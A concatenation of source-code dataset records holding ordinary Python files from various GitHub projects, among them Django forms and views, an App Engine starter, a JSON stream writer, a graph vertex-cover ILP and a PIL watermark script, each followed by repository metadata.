        """Return True when the queue holds no items."""
        return self._size == 0
    def get_size(self):
        """Return the number of items currently queued."""
        return self._size
    def __iter__(self):
        # Single shared cursor: two concurrent iterations over the same
        # queue would interfere with each other.
        self._next = self._first
        return self
    def __next__(self):
        if self._next is None:
            raise StopIteration
        item, self._next = self._next.item, self._next.next
        return item
|
[
"supernikolaj@hotmail.com"
] |
supernikolaj@hotmail.com
|
376e914eb4817ac06c5395b2987741fbc5b63b80
|
4e2b343558ed8f342bdc3ae79bc70a837bd5eb93
|
/AppEngine_lessons/app-engine-starter/main.py
|
4af85521ed36d1795fd71fb5e5e5d9d0e528346a
|
[] |
no_license
|
xmaslzq/CSSI
|
670d9fb8d533ef83418cf3e74725edc9ad1c94e8
|
83c58ca56e17ec4d3abc249369339d28661d1528
|
refs/heads/master
| 2022-01-25T23:04:22.594830
| 2019-06-20T17:11:55
| 2019-06-20T17:11:55
| 192,957,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
import os
import jinja2
#remember, you can get this by searching for jinja2 google app engine
# Jinja2 environment rooted at this file's directory; autoescape protects
# rendered templates from HTML injection.
jinja_current_dir = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions=['jinja2.ext.autoescape'],
    autoescape=True)
class MemeMainHandler(webapp2.RequestHandler):
    """Serves the welcome page for '/'."""
    def get(self):
        # Render templates/welcome.html with no template variables.
        start_template = jinja_current_dir.get_template("templates/welcome.html")
        self.response.write(start_template.render())
# WSGI entry point: App Engine routes '/' to MemeMainHandler.
app = webapp2.WSGIApplication([
    ('/', MemeMainHandler),
], debug=True)
|
[
"noreply@github.com"
] |
xmaslzq.noreply@github.com
|
badb20af55295ca775c372a5144771fd92c5ef52
|
d3700e19ac03dee2b53b5f094105a785a5ac7d6c
|
/source/accounts/forms.py
|
4ed06e720d8bd33fa1290c1259ca2dc40c7c1eaf
|
[] |
no_license
|
emilrakaev/final_exam
|
7ed571f8d073150ba0d0871a5c51556ba077aa8e
|
01b3fa63cdd1d28ce725a6bcc0c1aca5d1fd512d
|
refs/heads/master
| 2023-02-18T03:18:12.760590
| 2021-01-23T17:30:43
| 2021-01-23T17:30:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,752
|
py
|
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import AbstractUser
from django.core.exceptions import ValidationError
from django.urls import reverse
from django.conf import settings
from django import forms
from django.contrib.auth import get_user_model
from .models import AuthToken, Profile, TOKEN_TYPE_PASSWORD_RESET
class MyUserCreationForm(UserCreationForm):
    """Registration form with optional e-mail activation.

    When settings.ACTIVATE_USERS_EMAIL is true the new user is saved
    inactive and an activation link (AuthToken) is e-mailed; otherwise
    the user is saved active and a Profile is created immediately.
    """
    class Meta(UserCreationForm.Meta):
        fields = ['username', 'password1', 'password2',
                  'first_name', 'last_name', 'email']
    def save(self, commit=True):
        if settings.ACTIVATE_USERS_EMAIL:
            user: AbstractUser = super().save(commit=False)
            user.is_active = False
            if commit:
                user.save()
                token = self.create_token(user)
                self.send_email(user, token)
        else:
            user = super().save(commit=commit)
            # NOTE(review): a Profile is only created on this branch —
            # confirm the activation flow creates one for e-mail users.
            Profile.objects.create(user=user)
        return user
    def create_token(self, user):
        # Activation token with the model's default lifetime/type.
        return AuthToken.objects.create(user=user)
    def send_email(self, user, token):
        """Send the activation e-mail; failures are printed, not raised."""
        if user.email:
            subject = 'Вы создали учётную запись на сайте "Мой Блог"'
            link = settings.BASE_HOST + reverse('accounts:activate', kwargs={'token': token.token})
            message = f'''Здравствуйте, {user.username}!
Вы создали учётную запись на сайте "Мой Блог"
Активируйте её, перейдя по ссылке {link}.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
            html_message = f'''Здравствуйте, {user.username}!
Вы создали учётную запись на сайте "Мой Блог"
Активируйте её, перейдя по ссылке <a href="{link}">{link}</a>.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
            try:
                user.email_user(subject, message, html_message=html_message)
            except Exception as e:
                print(e)
class UserChangeForm(forms.ModelForm):
    """Profile-page form for editing basic user fields."""
    class Meta:
        model = get_user_model()
        fields = ['first_name', 'last_name', 'email']
        labels = {'first_name': 'Имя', 'last_name': 'Фамилия', 'email': 'Email'}
class ProfileChangeForm(forms.ModelForm):
    """Edits every Profile field except the user link itself."""
    class Meta:
        model = Profile
        exclude = ['user']
class SetPasswordForm(forms.ModelForm):
    """Set a new password (with confirmation) on `self.instance`."""
    password = forms.CharField(label="Новый пароль", strip=False, widget=forms.PasswordInput)
    password_confirm = forms.CharField(label="Подтвердите пароль", widget=forms.PasswordInput, strip=False)
    def clean_password_confirm(self):
        # Reject mismatching password/confirmation pairs.
        password = self.cleaned_data.get("password")
        password_confirm = self.cleaned_data.get("password_confirm")
        if password and password_confirm and password != password_confirm:
            raise forms.ValidationError('Пароли не совпадают!')
        return password_confirm
    def save(self, commit=True):
        # Hash via set_password rather than assigning the raw value.
        user = self.instance
        user.set_password(self.cleaned_data["password"])
        if commit:
            user.save()
        return user
    class Meta:
        model = get_user_model()
        fields = ['password', 'password_confirm']
class PasswordChangeForm(SetPasswordForm):
    """SetPasswordForm that additionally verifies the current password."""
    old_password = forms.CharField(label="Старый пароль", strip=False, widget=forms.PasswordInput)
    def clean_old_password(self):
        # The user must prove knowledge of the current password.
        old_password = self.cleaned_data.get('old_password')
        if not self.instance.check_password(old_password):
            raise forms.ValidationError('Старый пароль неправильный!')
        return old_password
    class Meta:
        model = get_user_model()
        fields = ['password', 'password_confirm', 'old_password']
class PasswordResetEmailForm(forms.Form):
    """Step 1 of password reset: collect a registered e-mail address."""
    email = forms.EmailField(required=True, label='Email')
    def clean_email(self):
        # Only accept addresses belonging to an existing user.
        email = self.cleaned_data.get('email')
        User = get_user_model()
        if User.objects.filter(email=email).count() == 0:
            raise ValidationError('Пользователь с таким email-ом не зарегистрирован')
        return email
    def send_email(self):
        """E-mail a 3-day reset-token link; failures are printed, not raised."""
        User = get_user_model()
        email = self.cleaned_data.get('email')
        user = User.objects.filter(email=email).first()
        token = AuthToken.objects.create(user=user, life_days=3, type=TOKEN_TYPE_PASSWORD_RESET)
        subject = 'Вы запросили восстановление пароля для учётной записи на сайте "Мой Блог"'
        link = settings.BASE_HOST + reverse('accounts:password_reset', kwargs={'token': token.token})
        message = f'''Ваша ссылка для восстановления пароля: {link}.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
        html_message = f'''Ваша ссылка для восстановления пароля: <a href="{link}">{link}</a>.
Если вы считаете, что это ошибка, просто игнорируйте это письмо.'''
        try:
            user.email_user(subject, message, html_message=html_message)
        except Exception as e:
            print(e)
class PasswordResetForm(SetPasswordForm):
    # Step 2 of password reset: behaviorally identical to SetPasswordForm;
    # the separate class keeps the reset flow distinct from ordinary change.
    pass
|
[
"emilrakaev@gmail.com"
] |
emilrakaev@gmail.com
|
7e78b16e6f13e52f35217553facf6e447114f404
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2536/60692/284231.py
|
f5965072cfb32c524819a0b6b6eb56e9052005d5
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
from collections import defaultdict
list1 = input()[3:-3].split("\"], [\"")
list1 = [i.split("\", \"") for i in list1]
list1.sort()
res = []
g = defaultdict(list)
print(list1)
'''
for i in range(len(list1)):
g[list1[i][0]].append(list1[i][1])
def dfs(x):
while g[x]:
r = g[x].pop()
dfs(r)
res.append(x)
dfs("JFK")
res.reverse()
print(res)
'''
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
7dc30a8675b6bdd42f226f0d1ba0f8e14ae70ca4
|
e82af0b3f84b66278c232f1d4407d7e6fb67343f
|
/src/aws_scatter_gather/util/jsonstream.py
|
58cbf247e4698690e832aadfd50d83c0f4f588ff
|
[
"Apache-2.0"
] |
permissive
|
cbuschka/aws-scatter-gather
|
5dbe73c1672b786e5d74696cc6a8df6fad859840
|
abebd22aa6449369845a08d4260607745098bb28
|
refs/heads/master
| 2022-12-25T04:00:17.299495
| 2020-09-18T20:33:58
| 2020-09-18T20:55:28
| 271,099,237
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,048
|
py
|
import json
from enum import Enum
class _State(Enum):
    """Writer positions for JsonStream's nesting state machine."""
    INITIAL = 0                      # nothing written yet
    OBJECT_STARTED = 1               # '{' written, no properties yet
    OBJECT_PROPERTY_STARTED = 2      # (unused, kept for compatibility)
    OBJECT_PROPERTY_AFTER_NAME = 3   # property name written, value pending
    OBJECT_PROPERTY_AFTER_VALUE = 4  # property value written
    ARRAY_STARTED = 5                # '[' written, no elements yet
    ARRAY_AFTER_VALUE = 6            # at least one array element written
    DONE = 7                         # complete top-level value written
class JsonStream(object):
    """Incremental JSON writer over a file-like object.

    JSON is emitted piece by piece (start_object / start_property /
    write_value / ...) while a stack of _State values validates that the
    calls form a well-formed document; an invalid call raises ValueError.
    """
    def __init__(self, fp, encoder: json.JSONEncoder = None, indent=None, separators=None):
        """fp: writable text stream; encoder/indent/separators mirror json.dumps."""
        self._state = []
        self._fp = fp
        self._indent = indent
        if separators is not None:
            self._item_separator, self._key_separator = separators
        elif indent is not None:
            # Match json.dumps(): with an indent and no explicit separators,
            # the defaults are (',', ': ').  BUG FIX: the original set only
            # _item_separator here, so _key_separator was undefined and the
            # encoder construction below raised AttributeError.
            self._item_separator = ','
            self._key_separator = ': '
        else:
            self._item_separator, self._key_separator = (', ', ': ')
        self._encoder = encoder or json.JSONEncoder(indent=self._indent,
                                                    separators=(self._item_separator, self._key_separator))
        self._push_state(_State.INITIAL)
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, tb):
        self.close()
    def start_array(self):
        """Open a JSON array: at top level, as a property value, or nested in an array."""
        if self._is_state(_State.INITIAL):
            self._fp.write("[")
            self._write_indent()
            self._set_state(_State.DONE)
            self._push_state(_State.ARRAY_STARTED)
        elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
            self._fp.write("[")
            self._write_indent()
            self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
            self._push_state(_State.ARRAY_STARTED)
        elif self._is_state(_State.ARRAY_STARTED):
            # Generalization: arrays may now nest directly inside arrays
            # (first element), mirroring what start_object already allowed.
            self._fp.write("[")
            self._write_indent()
            self._set_state(_State.ARRAY_AFTER_VALUE)
            self._push_state(_State.ARRAY_STARTED)
        elif self._is_state(_State.ARRAY_AFTER_VALUE):
            # Subsequent nested array: needs a leading item separator.
            self._fp.write("{}[".format(self._item_separator))
            self._write_indent()
            self._push_state(_State.ARRAY_STARTED)
        else:
            self._fail("start array")
    def end_array(self):
        """Close the innermost open array."""
        if self._is_state(_State.ARRAY_STARTED, _State.ARRAY_AFTER_VALUE):
            self._fp.write("]")
            self._pop_state()
        else:
            self._fail("end array")
    def start_object(self):
        """Open a JSON object: at top level, as a property value, or inside an array."""
        if self._is_state(_State.INITIAL):
            self._fp.write("{")
            self._write_indent()
            self._set_state(_State.DONE)
            self._push_state(_State.OBJECT_STARTED)
        elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
            self._fp.write("{")
            self._write_indent()
            self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
            self._push_state(_State.OBJECT_STARTED)
        elif self._is_state(_State.ARRAY_STARTED):
            self._fp.write("{")
            self._write_indent()
            self._set_state(_State.ARRAY_AFTER_VALUE)
            self._push_state(_State.OBJECT_STARTED)
        elif self._is_state(_State.ARRAY_AFTER_VALUE):
            # Subsequent object in an array needs a leading item separator.
            self._fp.write("{}{{".format(self._item_separator))
            self._write_indent()
            self._set_state(_State.ARRAY_AFTER_VALUE)
            self._push_state(_State.OBJECT_STARTED)
        else:
            self._fail("start object")
    def start_property(self, name):
        """Write a property name (and key separator); a value must follow."""
        if self._is_state(_State.OBJECT_PROPERTY_AFTER_VALUE):
            self._fp.write("{}\"{}\"{}".format(self._item_separator, name, self._key_separator))
            self._set_state(_State.OBJECT_PROPERTY_AFTER_NAME)
        elif self._is_state(_State.OBJECT_STARTED):
            self._fp.write("\"{}\"{}".format(name, self._key_separator))
            self._set_state(_State.OBJECT_PROPERTY_AFTER_NAME)
        else:
            self._fail("start property")
    def write_property(self, name, value):
        """Convenience: start_property(name) followed by write_value(value)."""
        self.start_property(name)
        self.write_value(value)
    def write_value(self, value):
        """Encode `value` with the configured encoder at the current position."""
        if self._is_state(_State.INITIAL):
            self._fp.write(self._encoder.encode(value))
            self._set_state(_State.DONE)
        elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
            self._fp.write(self._encoder.encode(value))
            self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
        elif self._is_state(_State.ARRAY_AFTER_VALUE):
            self._fp.write("{}{}".format(self._item_separator, self._encoder.encode(value)))
        elif self._is_state(_State.ARRAY_STARTED):
            self._fp.write(self._encoder.encode(value))
            self._set_state(_State.ARRAY_AFTER_VALUE)
        else:
            self._fail("value")
    def end_object(self):
        """Close the innermost open object."""
        if self._is_state(_State.OBJECT_PROPERTY_AFTER_VALUE, _State.OBJECT_STARTED):
            self._fp.write("}")
            self._pop_state()
        else:
            self._fail("end object")
    def flush(self):
        self._fp.flush()
    def close(self):
        """Flush and close the underlying stream."""
        self._fp.flush()
        self._fp.close()
    def _push_state(self, state):
        self._state.append(state)
    def _pop_state(self):
        return self._state.pop()
    def _is_state(self, *states):
        return self._state[-1] in states
    def _set_state(self, state):
        self._state[-1] = state
    def _peek_state(self):
        return self._state[-1]
    def _fail(self, op_name):
        raise ValueError("Invalid state for {}: {}".format(op_name, self._peek_state()))
    def _write_indent(self):
        # NOTE(review): only a newline is emitted after a container opener;
        # per-level indentation inside streamed containers is not produced
        # (only values encoded whole via the JSONEncoder are indented).
        if self._indent is None:
            return
        else:
            self._fp.write("\n")
|
[
"cbuschka@gmail.com"
] |
cbuschka@gmail.com
|
17b0c4bb31a2b73c753b146078a95266e2007669
|
846aa5f955058b6bef8a6f0b7824c7d1bdec2310
|
/coronagraph-master/old/readsmart/gas_info.py
|
4bb1b99f2c1a09ca965580df43a92d2604e3a54d
|
[] |
no_license
|
giadasprink/luvoir_simtools
|
ba96c7a5542d4c7e43d49c0050de0e5c84eb42fd
|
fa7d58de958d36eeb81975172b33964e114d1700
|
refs/heads/master
| 2021-01-12T14:40:23.621431
| 2016-11-04T17:11:07
| 2016-11-04T17:11:07
| 72,046,880
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,596
|
py
|
def gas_info():
    """
    Loads and returns HITRAN gas information (description)
    Parameters
    ----------
    None
    Returns
    -------
    load_gases.gas_info(): tuple array (mixed type)
    Notes
    -------
    This program loads the gas codes, formula code, descriptor string
    (formula name), mean molecular masses, and wavenumber coverage of HITRAN gases
    1-47 and additional noble and volcanic gases from gases.csv in /fixed_input/.'
    There are three gas code designations:
    'index' - the value that corresponds to the position of the gas info in the tuple array.
    This also corresponds to the HITRAN gas index up until gas number '47'.
    'h_index' - HITRAN gas index. Set to '0' if not a HITRAN gas.
    'old_index' - index value of gas for old smart_interface bash code.
    Matches 'index' and 'h_index' through gas index=39.
    The formula code is realized in three forms:
    'Formula' - molecular formula with proper capitalization
    (string, e.g. 'CH3Cl')
    'FORMULA' - molecular formula all caps (string, e.g. 'CH3CL')
    'formula' - molecular formula all lower case (string, e.g. 'ch3cl')
    These additional attributes are contained in the tuple:
    'name' - common name for the molecule or atomic gas species
    'mass' - mean molecular mass in g/mol
    'minwn' - minimum wavenumber of transitions cataloged in HITRAN 2012 database
    'maxwn' - maximum wavenumber of transitions cataloged in HITRAN 2012 database
    'n' - index of refraction of the gas at 589 nm at STP (n=-1 if unknown)
    References
    -------
    HITRAN gas codes from: http://www.cfa.harvard.edu/hitran/molecules.html
    Mean molecular masses from Wikipedia: http://www.wikipedia.org
    Refractive indices from: http://www.kayelaby.npl.co.uk/general_physics/2_5/2_5_7.html
    Examples
    -------
    >>> load_gases.gas_info()[:][1]
    (1, 1, 1, 'H2O', 'H2O', 'h2o', 'water', 18.02, 0.0, 25711.0, 1.000256)
    >>> load_gases.gas_info()['FORMULA'][48]
    'HE'
    >>> load_gases.gas_info()['Formula'][48]
    'He'
    >>> load_gases.gas_info()['Formula'][37]
    'HOBr'
    """
    import numpy as np
    import os
    # gases.csv ships alongside this module, not in the working directory.
    module_path = os.path.dirname(__file__)
    #read gases csv file
    file_name = '/'.join([module_path,'gases.csv'])
    #file_name = 'fixed_input/gases.csv'
    # dtype=None lets genfromtxt infer per-column types, producing a
    # structured array addressable by the field names listed below.
    gas_info = np.genfromtxt(file_name,dtype=None,delimiter=',',comments='#',\
    names=['index', 'h_index', 'old_index', 'Formula', 'FORMULA', 'formula', 'name', \
    'mass', 'minwn', 'maxwn', 'n'])
    return gas_info
|
[
"tumlinson@stsci.edu"
] |
tumlinson@stsci.edu
|
2c859b253fac52407a7a2212bb929210128fbe9b
|
c5e8e718f594356c34ea129dff00cc309ba0ac9c
|
/python352/myenv/lib/python3.5/tokenize.py
|
896bb4117f26e08aaf66e19238414085ddc27393
|
[] |
no_license
|
melnikaite/benchmarks
|
7f605039273bc5b0638c14f7d9bed56b7eda0186
|
d9c87873b0f6de4204030aeaeb35582ab6d9ca3d
|
refs/heads/master
| 2020-04-15T12:43:04.256491
| 2018-02-08T00:01:19
| 2018-02-12T10:35:11
| 65,220,513
| 3
| 4
| null | 2018-02-12T10:35:12
| 2016-08-08T16:28:34
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
/Users/melnikaite/.pyenv/versions/3.5.2/lib/python3.5/tokenize.py
|
[
"melnikaite.melnikaite@gmail.com"
] |
melnikaite.melnikaite@gmail.com
|
9a257d7cfb13814c6d325e4427720b746db62afa
|
0ff95a63f29b05ff8a894effcb3760de876deb42
|
/Pickle_Graffiti/graph_txt_files/txt_functions/vertex_cover_number.py
|
7dafe5ed1a06aacbe2e8ee0d2ed843597fab3089
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
RandyRDavila/Pickle_Graffiti
|
5e956031422918312215b7691e21b1307d3e0161
|
c54128d36eac1f013e9c544fabc81fd15056c250
|
refs/heads/master
| 2020-03-18T15:22:28.288345
| 2018-06-17T21:49:47
| 2018-06-17T21:49:47
| 134,903,705
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,613
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by
# David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
"""Functions for computing vertex covers and related invariants in a graph."""
from pulp import LpBinary, LpMinimize, LpProblem, LpVariable, lpSum
def min_vertex_cover_ilp(G):
"""Return a smallest vertex cover in the graph G.
This method uses an ILP to solve for a smallest vertex cover.
Specifically, the ILP minimizes
.. math::
\\sum_{v \\in V} x_v
subject to
.. math::
x_v + x_u \\geq 1 \\mathrm{for all } \\{u, v\\} \\in E
x_v \\in \\{0, 1\\} \\mathrm{for all } v \\in V
where *V* and *E* are the vertex and edge sets of *G*.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
set
A set of nodes in a smallest vertex cover.
"""
prob = LpProblem('min_vertex_cover', LpMinimize)
variables = {
node: LpVariable('x{}'.format(i+1), 0, 1, LpBinary)
for i, node in enumerate(G.nodes())
}
# Set the total domination number objective function
prob += lpSum([variables[n] for n in variables])
# Set constraints
for edge in G.edges():
prob += variables[edge[0]] + variables[edge[1]] >= 1
prob.solve()
solution_set = {node for node in variables if variables[node].value() == 1}
return solution_set
def min_vertex_cover(G, method='ilp'):
"""Return a smallest vertex cover of G.
A *vertex cover* of a graph *G* is a set of vertices with the
property that every edge in the graph is incident to at least one
vertex in the set.
Parameters
----------
G : NetworkX graph
An undirected graph.
method: string
The method to use for finding a smallest vertex cover.
Currently, the only option is 'ilp'. Defaults to 'ilp'.
Returns
-------
set
A set of nodes in a smallest vertex cover.
"""
vertex_cover_func = {
'ilp': min_vertex_cover_ilp,
}.get(method, None)
if vertex_cover_func:
return vertex_cover_func(G)
raise ValueError('Invalid `method` argument "{}"'.format(method))
def vertex_cover_number(G):
"""Return a the size of smallest vertex cover in the graph G.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
number
The size of a smallest vertex cover of G.
"""
return len(min_vertex_cover_ilp(G))
|
[
"randydavila@Randys-MacBook-Pro.local"
] |
randydavila@Randys-MacBook-Pro.local
|
5a9f2c65fb8af43f7235e7e8c0937d9c97e3caa7
|
2591b2b409b8cefedd6b226f0381aafea2aa123c
|
/leads/forms.py
|
11814485238e54ca5315f97dcd17215e7a3eb24f
|
[
"MIT"
] |
permissive
|
coderj001/Django-CRM
|
ae5f0cb6b6c5b5dba1e0713c32978f49b021e39f
|
7cca0df5d39b92082781047c1f0a11129179f257
|
refs/heads/master
| 2023-08-14T02:38:26.534561
| 2021-09-15T06:38:45
| 2021-09-15T06:38:45
| 369,114,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,235
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UsernameField
from leads.models import Agent, Lead, User
class LeadModelForm(forms.ModelForm):
class Meta:
model = Lead
fields = (
'first_name',
'last_name',
'age',
'agent',
'description',
'phone_number',
'email',
)
class LeadForm(forms.Form):
first_name = forms.CharField()
last_name = forms.CharField()
age = forms.IntegerField(min_value=0)
class CustomUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ("username", )
field_classes = {'username': UsernameField}
class AssignAgentForm(forms.Form):
agent = forms.ModelChoiceField(queryset=Agent.objects.none())
def __init__(self, *args, **kwargs):
request = kwargs.pop('request')
agents = Agent.objects.filter(organisation=request.user.userprofile)
super(AssignAgentForm, self).__init__(*args, **kwargs)
self.fields['agent'].queryset = agents
class LeadCategoryUpdateForm(forms.ModelForm):
class Meta:
model = Lead
fields = (
'category',
)
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
ed3a392122a91de6cdf437e0aae63e716e4b07fa
|
cce6fe18b46418de3df3384bd08707ca37dc85d8
|
/venv/lib/python2.7/copy_reg.py
|
ac6440875a567528d4c7b788bdea18c4372ca098
|
[] |
no_license
|
kyorgancioglu/CerebroServer
|
805bb4b6d3980bfd12ee02d5ee3627cb2f475da5
|
077fac942d5e20874e26468a0ceebf1f9fd94521
|
refs/heads/master
| 2021-01-19T18:14:02.638900
| 2017-05-08T14:48:10
| 2017-05-08T14:48:10
| 88,349,015
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
/Users/kaanyorgancioglu/anaconda2/lib/python2.7/copy_reg.py
|
[
"yorgancioglu.kaan@gmail.com"
] |
yorgancioglu.kaan@gmail.com
|
3aa284408b648d5cc4ba72c6e62f10f1f8ec9043
|
826d8196891852edf4e1ebe364120b916e320bb0
|
/blog/apps/views_staff.py
|
ff13e16848799f8c8a6c2b1859f7ef03a1c9d962
|
[] |
no_license
|
mtien10/flyandrew
|
6f1acdda37de44935d493945cb90ad99a6aea414
|
b3820d7a8069feb76efe3107398930e23d03614c
|
refs/heads/master
| 2023-08-24T12:49:58.732673
| 2021-09-24T06:52:15
| 2021-09-24T06:52:15
| 390,921,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,981
|
py
|
import json
from django.shortcuts import render
from django.shortcuts import HttpResponse
from django.shortcuts import get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import *
from django.views.generic.edit import CreateView
from django.views.generic.edit import UpdateView
from django.contrib.auth.mixins import LoginRequiredMixin
from datetime import datetime
@login_required
def index(request):
return render(request, 'index.html')
# Category
@login_required
def listCategory(request):
categoryList = Category.objects.all()
context = {'categoryList': categoryList}
return render(request, 'staff/category/list.html', context)
class CategoryCreateView(LoginRequiredMixin, CreateView):
model = Category
fields = '__all__'
template_name = 'staff/category/form.html'
success_url = '/staff'
class CategoryUpdateView(LoginRequiredMixin, UpdateView):
model = Category
fields = '__all__'
template_name = 'staff/category/form.html'
success_url = '/staff'
@login_required
def deleteCategory(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
c = Category.objects.get(pk=pk)
c.delete()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
# Product
@login_required
def listProduct(request):
productList = Product.objects.all()
context = {'productList': productList}
return render(request, 'staff/product/list.html', context)
class ProductCreateView(LoginRequiredMixin, CreateView):
model = Product
fields = '__all__'
template_name = 'staff/product/form.html'
success_url = '/staff/list-product'
class ProductUpdateView(LoginRequiredMixin, UpdateView):
model = Product
fields = '__all__'
template_name = 'staff/product/form.html'
success_url = '/staff/list-product'
@login_required
def deleteProduct(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
p = Product.objects.get(pk=pk)
p.delete()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
# Order
@login_required
def listOrder(request):
orderList = Order.objects.all()
context = {'orderList': orderList}
return render(request, 'staff/order/list.html', context)
@login_required
def viewOrder(request, pk):
order = get_object_or_404(Order, pk=pk)
context = {'order': order}
return render(request, 'staff/order/view_detail.html', context)
@login_required
def confirmOrderDelivered(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
order = get_object_or_404(Order, pk=pk)
order.status = Order.Status.DELIVERED
order.deliverDate = datetime.now()
order.save()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
def cancelOrder(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
order = get_object_or_404(Order, pk=pk)
order.status = Order.Status.CANCELLED
order.save()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
|
[
"tao.gboy@gmail.com"
] |
tao.gboy@gmail.com
|
12c623c20c5499450064a7ba06592696cd33d4a4
|
5abe97395fa199f652568ed13bae922ed4143737
|
/string3.py
|
33d378be2b9a29817e385208a92edf34ac537fb3
|
[] |
no_license
|
XanderEagle/unit7
|
7aa0590eec1e52712c85e85472a44444b98912cb
|
7d8ccc1a05ad9ad0002167f465c275109b4e5e22
|
refs/heads/master
| 2020-09-05T07:22:43.706795
| 2019-11-15T15:16:42
| 2019-11-15T15:16:42
| 220,025,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 142
|
py
|
def without_end(word):
return word[1:len(word)-1]
print(without_end("Hello"))
print(without_end("Python"))
print(without_end("coding"))
|
[
"alexander.eagle@ssfs.org"
] |
alexander.eagle@ssfs.org
|
2d53ca54d3805eb81d7ede0b47f643a341a88008
|
b1aa3c599c5d831444e0ae4e434f35f57b4c6c45
|
/month1/week2/class5/pillow5.py
|
45a028b539a26bd107597ff2defa4b69744fdd06
|
[] |
no_license
|
yunyusha/xunxibiji
|
2346d7f2406312363216c5bddbf97f35c1e2c238
|
f6c3ffb4df2387b8359b67d5e15e5e33e81e3f7d
|
refs/heads/master
| 2020-03-28T12:31:17.429159
| 2018-09-11T11:35:19
| 2018-09-11T11:35:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
from PIL import Image, ImageChops, ImageDraw, ImageFont
img = Image.open('img/1.jpg')
# 切换图片模式
img = img.convert('RGBA')
# 创建一个背景完全透明的图片模板,大小和原始图片一样大
w, h = img.size
new_img = Image.new('RGBA', (w, h), (0, 0, 0, 0))
# 使用ImageDraw生成一个画笔
# 此过程需要用户提前指定需要操作的图片
draw_1 = ImageDraw.Draw(new_img)
# 绘制文字
# 使用imageFont生成对应的字体
font = ImageFont.truetype('img/111.ttf', 50)
draw_1.text((100, 300), '啦啦啦啦啦', font=font, fill=(100, 101, 100))
new_img = new_img.rotate(45)
# 设置new_img向左下角移动
new_img = ImageChops.offset(new_img, -30, 30)
# new_img.show()
# 将文字和图片进行合并
combine_img = Image.alpha_composite(img, new_img)
combine_img.show()
# 图片保存
combine_img = combine_img.convert('RGB')
combine_img.save('kkk.jpg')
|
[
"576462286@qq.com"
] |
576462286@qq.com
|
47a14850a6883ecc86d83ddb8afe50e0011f8b56
|
b7947f82403adc72ee2413971272cb7cd0c7c685
|
/docs/examples/example.py
|
ad05bc5073c22d878b87d30729c83a883901e072
|
[
"Apache-2.0"
] |
permissive
|
WISDEM/RotorSE
|
e752f3ff77c0bdf768a96340036dbbc367d7af66
|
a4f75ed79f5ca10c869ed803037b52d5e74f0927
|
refs/heads/master
| 2021-06-03T12:52:19.847283
| 2019-09-04T14:15:44
| 2019-09-04T14:15:44
| 16,748,519
| 3
| 14
|
NOASSERTION
